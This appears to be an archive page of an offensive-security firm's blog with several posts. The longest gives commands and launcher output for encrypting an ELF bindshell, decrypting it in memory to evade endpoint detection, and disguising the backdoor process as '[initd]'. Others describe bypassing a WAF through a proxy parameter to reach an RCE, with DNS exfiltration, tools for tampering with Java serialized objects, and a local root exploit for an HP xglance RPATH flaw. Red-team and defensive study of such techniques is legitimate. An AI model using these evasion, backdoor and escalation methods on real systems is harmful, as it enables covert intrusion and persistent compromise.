Archives February 2020

Blue Team vs Red Team: how to run your encrypted ELF binary in memory and go undetected

Imagine finding yourself in a “hostile” environment, one where you can’t run exploits, tools and applications without worrying about prying eyes spying on you, be they a legitimate system administrator, a colleague sharing an access with you or a software solution that scans the machine you are logged in to for malicious files. Your binary should live in encrypted form in the filesystem so that no static analysis would be possible even if identified and copied somewhere else. It should be only decrypted on the fly in memory when executed, so preventing dynamic analysis too, unless the decryption key is known.

How to implement that?

On paper everything looks fine, but practically how do we implement this? With Red Timmy Security we have created the “golden frieza” project, a collection of several techniques to support on-the-fly encryption/decryption of binaries. Even though we are not ready yet to release the full project, we are going to discuss in depth one of the methods it implements, accompanied by some supporting source code.

Why is the discussion relevant both to security analysts working at SOC departments, Threat Intelligence and Red Teams? Think about a typical Red Team operation, in which tools that commonly trigger security alerts to SOC, such as “procmon” or “mimikatz”, are uploaded in a compromised machine and then launched without having the installed endpoint protection solutions or the EDR agents complaining about that. Alternatively, think about a zero-day privilege escalation exploit that an attacker wants to run locally in a just hacked system, but they don’t want it to be reverse engineered while stored in the filesystem and consequently divulged to the rest of the world.

This is exactly the kind of techniques we are going to talk about.

A short premise before to get started. All the examples and code released (github link) work with ELF binaries. Conceptually there is nothing preventing you from implementing the same techniques with Windows PE binaries, of course with the opportune adjustments.

What to encrypt?

An ELF binary file is composed of multiple sections. We are mostly interested to encrypt the “.text” section where are located the instructions that the CPU executes when the interpreter maps the binary in memory and transfers the execution control over it. To put it simple, the section “.text” contains the logic of our application that we do not want to be reverse-engineered.

Which crypto algorithm to use?

To encrypt the “.text” section we will avoid block ciphers, which would force the binary instructions into that section to be aligned to the block size. A stream cipher algorithm fits perfectly in this case, because the length of the ciphertext produced in output will be equal to the plaintext, hence there are not padding or alignment requirements to satisfy. We choose RC4 as encryption algorithm. The discussion of its security is beyond the scope of this blog post. You might implement whatever else you like in replacement.

The implementation

The technique to-be implemented must be as easy as possible. We want to avoid manual memory mappings and symbol relocations. For example, our solution could rely on two components:

  • An ELF file compiled as a dynamic library exporting one or more functions containing the encrypted instructions to be protected from prying eyes;
  • the launcher, a program that takes as an input the ELF dynamic library, decrypting it in memory by means of a crypto key and then executing it.

What is not clear yet is what we should encrypt: the full “.text” section or just the malicious functions exported in the ELF module? Let’s try to put in practice an experiment. The following source code exports a function called “testalo()” taking no parameter. After compilation we want it to be decrypted only once it is loaded in memory.

We compile the code as a dynamic library:

$ gcc testalo_mod.c -o -shared -fPIC

Now let’s have a look at its sections with “readelf”:

The “.text” section in the present case starts at file offset 0x580 (1408 bytes from the beginning of and its size is 0x100 (256 bytes). What if we fill up this space with zeros and then try to programmatically load the library? Will it be mapped in our process memory or the interpreter will have something to complain about? As the encryption procedure creates garbage binary instructions, filling up the “.text” section of our module with zeros actually simulates that without trying your hand at encrypting the binary. We can do that by executing the command:

$ dd if=/dev/zero seek=1408 bs=1 count=256 conv=notrunc

…and then verifying with “xxd” that the “.text” section has been indeed entirely zeroed:

$ xxd
00000580: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000590: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000670: 0000 0000 0000 0000 0000 0000 0000 0000 ................

To spot the final behavior that we are attemping to observe, we need an application (see code snippet of “dlopen_test.c” below) that tries to map the “” module into its address space (line 12) and then, in case of success, checks if at runtime the function “testalo()” gets resolved (line 18) and executed (line 23).

Let’s compile and execute it:

$ gcc dlopen_test -o dlopen_test -ldl
$ ./dlopen_test
Segmentation fault (core dumped)

What we are observing here is that during the execution of line 12 the program crashes. Why? This happens because, even if the call to “dlopen()” in our application is not explicitly invoking anything from “”, there are functions into “” itself that are instead automatically called (such as “frame_dummy()”) during the module initialization process. A “gdb” session will help here.

$ objdump -M intel -d

Because such functions are all zeroed, this produces a segmentation fault when the execution flow is transferred over those.

What if we only encrypted the content of the “testalo()” function on which our logic resides? To do that we just recompile “” and determine the size of the function’s code with the command “objdump -M intel -d“, by observing where the function starts and where it ends :

The formula to calculate our value is 0x6800x65a = 0x26 = 38 bytes.

Finally we overwrite the library “” with 38 bytes of zeros, starting from where the “testalo()” function locates, which this time is offset 0x65a = 1626 bytes from the beginning of the file:

$ dd if=/dev/zero seek=1626 bs=1 count=38 conv=notrunc

Then we can launch “dlopen_test” again:

$ ./dlopen_test
Segmentation fault (core dumped)

It seems nothing has changed. But a closer look will reveal the segfault has occurred for another reason this time:

Previously we have got stuck at line 12 in “dlopen_test.c”, during the initialization of the “” dynamic library. Now instead we get stuck at line 23, when “” has been properly mapped in our process memory, the “testalo()” symbol has been already resolved from it (line 18) and the function is finally invoked (line 23), which in turn causes the crash. Of course, the binary instructions are invalid because before we have zeroed that block of memory. However if we really had put encrypted instructions there and decrypted all before the invocation of “testalo()“,  everything would have worked smoothly.

So, we know now what to encrypt and how to encrypt it: only the exported functions holding our malicious payload or application logic, not the whole text section.

Next step: a first prototype for the project

Let’s see a practical example of how to decrypt in memory our encrypted payload. We said at the beginning that two components are needed in our implementation:

  • (a) an ELF file compiled as a dynamic library exporting one or more functions containing the encrypted instructions to be protected from prying eyes;
  • (b) the launcher, a program that takes as an input the ELF dynamic library, decrypting it in memory by means of a crypto key and then executing it.

Regarding the point (a) we will continue to utilize “” for now by encrypting the “testalo()” function’s content only. Instead of using a specific program for that, just take profit of existing tools such as “dd” and “openssl”:

$ dd if=./ of=./text_section.txt skip=1626 bs=1 count=38

$ openssl rc4 -e -K 41414141414141414141414141414141 -in text_section.txt -out text_section.enc -nopad

$ dd if=./text_section.enc seek=1626 bs=1 count=38 conv=notrunc

The first command basically extracts 38 bytes composing the binary instructions of “testalo()”. The second command encrypt these with the RC4 key “AAAAAAAAAAAAAAAA” (hex representation -> “41414141414141414141414141414141”) and the third command write back the encrypted content to the place where “testalo()” is located into the binary. If we observe the code of that function now with the command “objdump -M intel -d ./“, it will be unintelligible indeed:

The second needed component is the launcher (b). Let’s analyze its C code piece by piece. First it acquires in hexadecimal format the offset where our encrypted function is mapped (information that we retrieve with “readelf”) and its length in byte (line 102). Then the terminal echo is disabled (lines 116-125) in order to permit the user to type in safely the crypto key (line 128) and finally the terminal is restored back to the original state (lines 131-135).

Now we have the offset where our encrypted function is in memory but we do not know yet the full memory address where it is mapped. This is determined by looking at “/proc/PID/maps” as in the code snippet down.

Then all the pieces are settled to extract from the memory the encrypted binary instructions (line 199), decrypt everything with the RC4 key collected previously and write the output back to the location where “testalo()” function’s content lives (line 213). However, we could not do that without before marking that page of memory to be writable (lines 206-210) and then back again readable/executable only (lines 218-222) after the decrypted payload is written into it. This is because in order to protect the executable code against tampering at runtime, the interpreter loads it into a not writable memory region. After usage, the crypto key is also wiped out from memory (line 214).

Now the address of the decrypted “testalo()” function can be resolved (line 228) and the binary instructions it contains be executed (line 234).

This first version of the launcher’s source code is downloadable from here. Let’s compile it…

$ gcc golden_frieza_launcher_v1.c -o golden_frieza_launcher_v1 -ldl

…execute it, and see how it works (in bold the user input):

$ ./golden_frieza_launcher_v1 ./
Enter offset and len in hex (0xXX): 0x65a 0x26
Offset is 1626 bytes
Len is 38 bytes
Enter key: <-- key is inserted here but not echoed back
PID is: 28527
Module name is:
7feb51c56000-7feb51c57000 r-xp 00000000 fd:01 7602195 /tmp/
Start address is: 0x7feb51c56000
End address is 0x7feb51c57000

Execution of .text
Sucalo Sucalo oh oh!
oh oh Sucalo Sucalo!!

As shown at the end of the command output, the in-memory decrypted content of the “testalo()” function is indeed successfully executed.


What is the problem with this approach? It is that even though our library would be stripped, the symbols of the functions invoked by “testalo()” (such as “puts()” and “exit()”) that need to be resolved and relocated at runtime, remain well visible. In case the binary finishes in the hands of a system administrator or SOC analyst, even with the “.text” section encrypted in the filesystem, through simple static analysis tools such as “objdump” and “readelf” they could inference what is the purpose of our malicious binary.

Let’s see it with a more concrete example. Instead of using a dummy library, we decide to implement a bindshell (see the code here) and compile that code as an ELF module:

$ gcc testalo_bindshell.c –o –shared -fPIC

We strip the binary with the “strip” command and encrypt the relevant “.text” portion as already explained before. If now we look at symbols table (“readelf –s”) or relocations table (“readelf –r”) something very similar to the picture below appears:

This clearly reveals the usage of API such as “bind()”, “listen()”, “accept()”, “execl()”, etc… which are all functions that typically a bindshell implementation imports. This is inconvenient in our case because reveals the nature of our code. We need to get a workaround.

dlopen and dlsyms

To get around the problem, the approach we adopt is to resolve external symbols at runtime through “dlopen()” and “dlsyms()”.

For example, normally a snippet of code involving a call to “socket()” would look like this:

if((srv_sockfd = socket(PF_INET, SOCK_STREAM, 0)) < 0)

When the binary is compiled and linked, the piece of code above is responsible for the creation of an entry about “socket()” in the dynamic symbols and relocations tables. As already said, we want to avoid such a condition. Therefore the piece of code above must be changed as follows:

Here “dlopen()” is invoked only once and “dlsyms()” is called for any external functions that must be resolved. In practice:

  • int (*_socket)(int, int, int);” -> we define a function pointer variable having the same prototype as the original “socket()” function.
  • handle = dlopen (NULL, RTLD_LAZY);” -> “if the first parameter is NULL the returned handle is for the main program”, as stated in the linux man page.
  • _socket = dlsym(handle, "socket");” -> the variable “_socket” will contain the address of the “socket()” function resolved at runtime with “dlsym()”.
  • (*_socket)(PF_INET, SOCK_STREAM, 0)” -> we use it as an equivalent form of “socket(PF_INET, SOCK_STREAM, 0)”. Basically the value pointed to by the variable “_socket” is the address of the “socket()” function that has been resolved with “dlsym()”.

These modifications must be repeated for all the external functions “bind()”, “listen()”, “accept()”, “execl()”, etc…

You can see the differences between the two coding styles by comparing the UNMODIFIED BINDSHELL LIBRARY and the MODIFIED ONE. After that the new library is compiled:

$ gcc testalo_bindshell_mod.c -shared -o -fPIC

…the main effects tied to the change of coding style are the following:

In practice the only external symbols that remain visible now are “dlopen()” and “dlsyms()”. No usage of any other socket API or functions can be inferenced.

Is this enough?

This approach has some issues too. To understand that, let’s have a look at the read-only data section in the ELF dynamic library:

What’s going on? In practice, all the strings we have declared in our bindshell module are finished in clear-text inside the “.rodata” section (starting at offset 0xaf5 and ending at offset 0xbb5) which contains all the constant values declared in the C program! Why is this happening? It depends on the way how we pass string parameters to the external functions:

_socket = dlsym(handle, "socket");

What we can do to get around the issue is to encrypt the “.rodata” section as well, and decrypt it on-the-fly in memory when needed, as we have already done with the binary instructions in the “.text” section. The new version of the launcher component (golden_frieza_launcher_v2) can be downloaded here and compiled with “gcc golden_frieza_launcher_v2.c -o golden_frieza_launcher_v2 -ldl”. Let’s see how it works. First the “.text” section of our bindshell module is encrypted:

$ dd if=./ of=./text_section.txt skip=1738 bs=1 count=1055

$ openssl rc4 -e -K 41414141414141414141414141414141 -in text_section.txt -out text_section.enc –nopad

$ dd if=./text_section.enc of=./ seek=1738 bs=1 count=1055 conv=notrunc

Same thing for the “.rodata” section:

$ dd if=./ of=./rodata_section.txt skip=2805 bs=1 count=193

$ openssl rc4 -e -K 41414141414141414141414141414141 -in rodata_section.txt -out rodata_section.enc -nopad

$ dd if=./rodata_section.enc of=./ seek=2805 bs=1 count=193 conv=notrunc

Then the launcher is executed. It takes the bindshell module filename (now both with encrypted “.text” and “.rodata” sections) as a parameter:

$ ./golden_frieza_launcher_v2 ./

The “.text” section offset and length is passed as hex values (we have already seen how to get those):

Enter .text offset and len in hex (0xXX): 0x6ca 0x41f
Offset is 1738 bytes
Len is 1055 bytes

Next the “.rodata” section offset and length is passed too as hex values. As seen in the last “readelf” screenshot above, in this case the section starts at 0xaf5 and the len is calculated like this: 0xbb50xaf5 + 1 = 0xc1:

Enter .rodata offset and len in hex (0xXX): 0xaf5 0xc1
.rodata offset is 2805 bytes
.rodata len is 193 bytes

Then the launcher asks for a command line parameter. Indeed our bindshell module (specifically the exported  “testalo()” function) takes as an input parameter the TCP port it has to listen to. We choose 9000 for this example:

Enter cmdline: 9000
Cmdline is: 9000

The encryption key (“AAAAAAAAAAAAAAAA”) is now inserted without being echoed back:

Enter key:

The final part of the output is:

PID is: 3915
Module name is:
7f5d0942f000-7f5d09430000 r-xp 00000000 fd:01 7602214 /tmp/
Start address is: 0x7f5d0942f000
End address is 0x7f5d09430000

Execution of .text

This time below the “Execution of .text” message we get nothing. This is due to the behavior of our bindshell that does not print anything to the standard output. However, the bindshell backdoor has been launched properly in the background:

$ netstat -an | grep 9000
tcp 0 0* LISTEN

$ telnet localhost 9000
Connected to localhost.
Escape character is '^]'.
python -c 'import pty; pty.spawn("/bin/sh")'
$ id
uid=1000(cippalippa) gid=1000(cippalippa_group)

Last old-school trick of the day

A valuable point is: how is the process shown in the process list after the bindshell backdoor is executed?

$ ps -wuax
./golden_frieza_launcher_v2 ./

Unfortunately the system owner could identify the process as malicious on first glance! This is not normally an issue in case our code runs for a narrowed amount of time. But what in case we want to plant a backdoor or C&C agent for a longer period of time? In that case it would be convenient to mask the process somehow. It is exactly what the piece of code below (implemented in complete form here) does.

Let’s first compile the new version of the launcher binary:

$ gcc golden_frieza_launcher_v3.c -o golden_frieza_launcher_v3 -ldl

This time the launcher takes an additional parameter beyond the encrypted dynamic library filename, which is the name we want to assign to the process. In the example below “[initd]” is used:

$ ./golden_frieza_launcher_v3 ./ "[initd]"

Indeed by means of “netstat” we can spot the PID of the process (assuming the bindshell backdoor has started on TCP port 9876):

$ netstat -tupan | grep 9876
tcp 0 0* LISTEN 19087

…and from the PID the actual process name:

$ ps -wuax | grep init
user 19087 0.0 0.0 8648 112 pts/5 S 19:56 0:00 [initd]

Well you now know should never trust the ps output! 🙂


What if somebody discovers the launcher binary and the encrypted ELF dynamic library in the filesystem? The encryption key is not known hence nobody could decrypt and execute our payload.

What if the offset and length of encrypted sections are entered incorrectly? This will lead most of the cases to a segfault or illegal instruction and the consequent crash of the launcher component. Again, the code does not leak out.

Can this be done on Windows machine? Well, if you think about “LoadLibrary()”, “LoadModule()” and  “GetProcAddress()”, these functions API do the same as “dlopen()” and “dlsyms()”.

That’s all for today!

Snafuz, snafuz!

Interactive modification of Java Serialized Objects with SerialTweaker

Today we release another Java tool from the Serially toolkit. This tool can be used for advanced Java Deserialization attacks, when existing gadget chains don’t work or when there is a whitelist mechanism in place (like LookAheadDeserialization). In that case we have to work with the classes that are in the whitelist and thus accepted by the application. Instead of sending a gadget chain containing classes not familiar in the application, the idea is to modify the existing serialized objects that are used by the application during normal operations.

WARNING! This tool will deserialize input that it is given. It is therefore vulnerable to deserialization attacks by definition. Please make sure the input you use is not malicious, and/or use the tool in an isolated sandboxed environment.

Example usage

The probability to achieve RCE this way is pretty small, however in this kind of attack something like an authorization bypass is much more likely. Let’s discuss an example on how to perform the Java serialized object modifcation. Imagine an object that contains information about a user. It may contain values like ID, username and references to an object that defines roles and permissions. If we spot this object in serialized form on the wire, we can feed it to SerialTweaker in the following way:

We feed the Base64-encoded version of the serialized object directly on the command line as argument of ‘-b’. SerialTweaker will decode it to a raw serialized object and analyze it via a customized implementation of ObjectInputStream. This customized version captures all classes which are inside the serialized object, so we can create a list of classes that are needed to perform deserialization. Note that in order to deserialize the object locally, the Java runtime must have the required classes in the classpath. Therefore we use the same technique as with EnumJavaLibs: we keep a local repository of jar files and dynamically load what is needed.

So once the analysis finished, SerialTweaker preloads the required libraries. The next step is to attempt deserialization. If it encounters a class that is present in multiple jar files, it will prompt the user to choose which library to load from. In our case, the classes are directly traceable to the jar file “UserDb.jar”, so no prompt is shown. The big integers following the class names are the SerialVersionUID’s of the class.

Modifying variables

When deserialized, the contents of class variables are printed. These are values which are normally encoded within the serialized object, and thus values that we can modify. Keep in mind that static and transient variables are not serialized by default. SerialTweaker will print them and allow you to modify them, because there can be implemented a writeObject() method in the class that does serialize them. But in the default case it will not work to modify these values because they are not serialized. A warning “(not serialized by default)” will be printed after the variable output to remind the user of this behavior.

In our example, the 3rd field of the User class is a reference to a Roles object. SerialTweaker recognizes references and will print nested classes. The Roles class contains a boolean variable, which we would like to change to true.

Next, the user is prompted if he wants to perform any modifications. We type the id of the field we want to change (3), and the new value for it (T, for true). SerialTweaker prints the modified version of the object to confirm the modification was successful. If we’re done making changes, the modified object is serialized and the Base64 output is printed to the user.

Modifying ViewState

An interesting subject of serialized object modification might be JSF viewstates. When configured to store state client side, JSF websites will ship back- and forward a serialized object with every request. It’s usually a large object containing information about the state of UI elements. Changing these values might give an attacker opportunity to bypass certain restrictions.

SerialTweaker has a special ‘viewstate mode’, which will grab and decrypt (with ‘-k’) the viewstate from a given URL. Use the ‘-v’ flag to supply the URL.


There are already existing tools out there that can modify serialized objects. The difference is that they work by modifying the serialized object directly, working on a much lower level. This method is error-prone, because the serialized object contains various length fields and references, which need to be updated accordingly. SerialTweaker can make much more advanced modifications, but it comes with a price. You need to have the classes in your classpath in order to be able to deserialize them. Modifying values inside custom classes is therefore not possible with this approach.

The local repository of jar files is expected in ~/.serially/jars and should be indexed by using from the EnumJavaLibs project.


The tool is released on our GitHub page.

How to hack a company by circumventing its WAF through the abuse of a different security appliance and win bug bounties

Hey, wait! What do bug bounties and network security appliances have in common? Usually nothing! On the contrary, the security appliances allow virtual patching practices and actively participate to reduce the number of bug bounties paid to researchers…but this is a reverse story: a bug bounty was paid to us thanks to a misconfigured security appliance. We are not going to reveal neither the name of the affected company (except it was a Fortune 500) nor the one of the vulnerable component. However, we will be talking about the technique used, because it is astonishingly of disarming simplicity.

The observation

All has begun by browsing what at that time we did not even know yet to be a valuable target, let us call it “https://targetdomain“. Almost by accident, we noticed that a subdomain responsible for the authentication on that website had exposed some CSS and Javascript resources attributable to a Java component well known to be vulnerable to RCE (Remote Code Execution).

The weird thing was that by browsing the affected endpoint (something like “https://auth.targetdomain/vulnerable_endpoint?param=malicious_RCE_payload“) we received a HTTP 404 reply from the server, which made us suspect the presence of a Web Application Firewall. Why that particular endpoint should not be reachable if the resources decorating it (like .css and .js files) are? This clearly made us believe we were in front of a WAF. After a few more requests, all blocked, we confirmed some kind of WAF rule was indeed preventing us from reaching the target endpoint.

The “weird” thing

By browsing one of the applications hosted (i.e. https://targetdomain/appname) we are invited to authenticate to “https//auth.targetdomain“. During the authentication process, we notice another strange thing. At a certain moment we are redirected to a URL like:


with “aHR0cHM6Ly90YXJnZXRkb21haW4vYXBwbmFtZQ==” being clearly a base64-encoded string. The base64 payload, after decoding, showed to be nothing more that the URL we had originally requested access to before starting the authentication, that is “https://targetdomain/appname“.

But what actually that “cfru” parameter was? Some quick research online shows it is part of the Bluecoat web filtering technology, a notorious proxy server appliance. So, this told us a bit more about the remote infrastructure. The HTTP requests we send to the target cross at least one WAF device and a Bluecoat proxy server before reaching the front end web servers and application servers, like reconstructed below.

The idea

A light bulb has lit up on our head once we discovered that this “cfru” parameter was publicly accessible, namely no authentication to the portal was required to pass our payload to it. Therefore we started to base64-encode URLs of external domains under our control and feed the “cfru” parameter with these strings.  The hope was to trigger some kind of SSRF. What we got at the end was much better.

Unfortunately, at that specific moment in time, we did not receive back any HTTP requests. However, in our internet-exposed machines, we could see the DNS resolution process started from “targetdomain”. It seemed the TCP outgoing connections from target website were prohibited.  The only authorized thing was, as said, DNS traffic. Then instead of trying to trigger SSRF requests to external hosts we turned our attention to internal subdomains (https://auth.targetdomain, https://blog.targetdomain, https://www.targetdomain, etc…).

We start to base64-encode few of these URLs into the “cfru” parameter and almost immediately notice another weirdness. For some URLs we get a HTTP 302 redirect back. For some others we do not. In this latter case instead the HTTP body in the reply contains the HTML code of the requested resource, as if Bluecoat forwarded the request to the destination resource and returned its content back to us by acting as a web proxy. Most importantly, this behavior was observed also when we encoded in the “cfru” parameter the subdomain responsible for the authentication to the portal (https//auth.targetdomain), namely the one we believed was hosting a Java component vulnerable to RCE.

The turning point

Here was the turning point! We have made the following assumption. If the resource


is directly browsed, our HTTP request lands immediately to the WAF, where there is configured a rule that recognizes the malicious attempt (the malicious payload pointed to by “param“) and sends back a HTTP 404 error, in fact blocking the attack.

But what if we encode in base64 the URL


which produces the following base64 string


and pass it to the “cfru” parameter as follows?


In our case:

  1. The request crossed the WAF which had nothing to complain.
  2. Then it arrived to the Bluecoat device that in turn base64-decoded the “cfru” parameter and issued a GET request toward the internal host https://auth.targetdomain/vulnerable_endpoint?param=malicious_RCE_payload.
  3. This in turn triggered the vulnerability.


And bingo! We can see the output of our malicious payload (nothing more than the “hostname” command) exfiltrated via DNS (outgoing TCP connections to our host located in the internet were indeed blocked as already said previously).

Furthermore, we played a bit with our malicious payload in order to have the output of our injected commands returned directly as part of the HTTP headers in the server reply.


There are at least two mistakes that can be spot here:

  • The bluecoat device was behaving as a request “forwarder” instead of responding with a HTTP redirect as happened for other URLs (that would have caused the subsequent client requests to be caught and blocked by WAF).
  • There was no rule implemented at WAF level that base64-decoded the “cfru” parameter before passing it to the Bluecoat device, in order to analyze whether or not the request’s content matched with one of the blocking rules deployed in the WAF itself.

Good for us! We notified the vulnerability to the vendor straight away and they decided to recognize us a nice bug bounty!

The bottom line here is that virtual patching is ok if you need a bit of extra time before fixing a serious vulnerability. But if you use it in place of real patching, well it is only question of time before you will get hacked.

If you want to know more about similar exploitation techniques and other web hacking tricks, check out our Blackhat Las Vegas courses on August 1-2 August and 3-4 August 2020, because this will be one of the topics covered there.

Remote Java classpath enumeration with EnumJavaLibs

To discover a deserialization vulnerability is often pretty straightforward. When source code is available, it comes down to finding calls to readObject() and finding a way for user input to reach that function. In case we don’t have source code available, we can spot serialized objects on the wire by looking for binary blobs or base64 encoded objects (recognized by ‘rO0..’). The hard part comes with exploitation. Sure you can throw all exploits from ysoserial at it and hope for the best, but if it doesn’t work there are not much other things to try.

The big piece of information which is missing at this point, is information about the classpath of the remote application. If we know what libraries are loaded, we might be able to construct a gadget chain (or adjust the existing ysoserial exploit to match the version of the library on the remote application, for example). That’s where the idea of EnumJavaLibs comes from: just let it deserialize arbitrary objects from different (popular) 3rd party Java libraries. More specifically:

  1. Create a local database of the most common Java libraries
  2. For each of these libraries, find a class that is serializable
  3. Create an instance of this object, serialize it, and send it to the remote application
  4. If we get a ClassNotFoundException back, we know the library is not on the classpath

We have released the code of this project on GitHub, together with a tool that can build a database of libraries ( You can download the pre-compiled version over here.


JMX/RMI is a perfect example where Java classpath enumeration can be done, as it meets the above conditions. When the endpoint is running a vulnerable Java version (that is, before JEP290 implementation), JMX/RMI endpoints are vulnerable by default (regardless whether authentication is required). This is because a JMX/RMI endpoint exposes the RMIServerImpl_Stub.newClient(Object o) function which deserializes any object provided (RMI functions that accept parameters of type Object should always be a red flag).

EnumJavaLibs has a specific ‘RMI’ mode which allows you to specify IP and port of the RMI service. It will then invoke the newClient() function for each serialized object from the jars in the database. Upon deserialization error, we get the full stacktrace back via RMI, so we can easily read whether the class was found or not – and conclude if the library is loaded in the classpath.

Web applications

Because the way to probe web applications is highly specific case to case, Enumjavalibs will not perform the HTTP requests for you. Instead, it will create a CSV file with (classname, base64_encoded_serialized_object) for you, which you can then use to build requests yourself. One way to do this would be to use Burp intruder.


The tool uses a few Java ‘tricks’ which I would like to give some more details about. The first one is dynamic loading of libraries. This is made a lot harder (but not impossible) since Java 11, which is why the tool should be compiled with Java 8. Using URLClassLoader.addUrl(), it is possible to load a jar file specified by its path. Because this function is not exposed by the JDK, reflection is required to make it accessible.

Once we load the jar, we go through all its classes one-by-one, and try to serialize them. It doesn’t matter to us which class, all we want is some class from the jar file. If the remote server is able to deserialize this class, there’s a high probability the library it comes from is loaded. But how do we serialize an arbitrary class from a jar file? Normally serialization happens as follows:

  1. Instantiate an object of the class with ‘new …’
  2. Serialize the object using ObjectOutputStream

To instantiate the object, we need information about its constructors though. We could get that via reflection, but what if it has a constructor that takes as argument another object? Or what if some conditions need to be met for these arguments, or otherwise the constructor will throw an exception? This results in a complex situation, which is hard to handle automatically. Fortunately, there is a way to instantiate objects without invoking constructors. And it’s not pretty. But it works.

It’s called the Unsafe class and it let’s you do things that Java would normally forbid you to (for good reasons). One of them being instantiating classes without invoking the constructor. This works for our purposes, because at the remote side the ClassNotFoundException is thrown based on the name of the class – we don’t actually care about it being initialized properly. So after instantiation via Unsafe, we can serialize the object and – depending how you run the tool – send it off over RMI or store the Base64 encoded version in the output file.

False positives

It might happen that the class which is deserialized at the remote server, could actually be traced back to multiple libraries. Recall that we distinguish classes based on the combination of FQDN and SerialVersionUID. So when the serializable class doesn’t specify a custom SerialVersionUID in the source code, it is not unthinkable that a collision occurs (which means FQDN is the same). But even in this case we can still be pretty sure about which library is used – just not the exact version. Take for example the FQDN “org.apache.commons.fileupload.DiskFileUpload”; we can be pretty sure it comes from the commons-fileupload library, even though we might be unable to identify the exact version because the SerialVersionUID is the same between different versions.

Hey! Red Timmy Security will be at Blackhat Las Vegas this year too! Check out our trainings!

Practical Web Application Hacking Advanced 1-2 August and 3-4 August 2020.

Privilege Escalation via HP xglance using perf-exploiter

In one of our recent penetration tests we have abused a vulnerability affecting a suid binary called “xglance-bin“. Part of HP Performance Monitoring solution, it allowed us to escalate our local unprivileged sessions on some Linux RHEL 7.x/8.x systems to root. To be very honest, it was not the first time we leveraged that specific vulnerability as we abused it frequently on many HP servers with RHEL installed since 2014.

There has been indeed a CVE registered for the flaw (CVE-2014-2630) originally discovered by Tim Brown from Portcullis. However the description for it was a bit criptic (aka completely useless) -> “Unspecified vulnerability in HP Operations Agent 11.00, when Glance is used, allows local users to gain privileges via unknown vectors“. Unspecified vulnerability? Unknown vector? Well… up to today, there is no trace in the internet of a public exploit. Hence the idea to release our code.

Short description

Linux applications use shared libraries (.so extension) which are a bit like DLLs in Windows applications. An ELF binary needs to know where these .so libraries are stored, so it could load them when it is being executed.

There are several methods for specifying the location of dynamic libraries:

  1. Using “rpath” or “--rpath-link” options when compiling the application.
  2. Using the environment variable LD_RUN_PATH.
  3. Using the environment variable LD_LIBRARY_PATH.
  4. Using the value of DT_RUNPATH or DT_PATH, set with “rpath” option.
  5. Putting libraries into default /lib and /usr/lib directories.
  6. Specifying a directory containing libraries in /etc/

The objective of an attacker would be to control one of methods above in order to replace an existing dynamic library by a malicious one. This is the context of the vulnerability we exploited. Specifically we took advantage of case 1.

$ objdump -x xglance-bin | grep RPATH
RPATH -L/lib64:/usr/lib64:/usr/X11R6/lib64:/opt/perf/lib64

Indeed, as the “objdump” output clearly showed, the RPATH method was used to specify the location of dynamic libraries for the binary. Unfortunately one of those folders is pointing to a relative path. We can simply create the directory “-L/lib64”, put inside there a malicious library named as one of those xglance-bin loads…

$ ldd /opt/perf/bin/xglance-bin
[...] => -L/lib64/ (0x00007f0fb2b92000) => -L/lib64/ (0x00007f0fb2990000)

…and then launch the binary “/opt/perf/bin/xglance-bin” to escalate to root. The code can be downloaded from github and it is quite self-explanatory.  Just make the bash script executable, run it and it will perform all the exploitation steps for you. It needs the presence of a compiler in the target machine. Alternatively the library can be compiled in a compatible local system and then copied manually to the remote one.

Probably one word should be spent about symbols declared in the code itself that make it very big. This was due to some libraries that “xglance-bin” was trying to load but that were missing in the system we exploited. Instead of copying the absent libraries we just declared all the missing symbols in our code (nm, grep and cut are always your friends). Your environment could be different and not require that.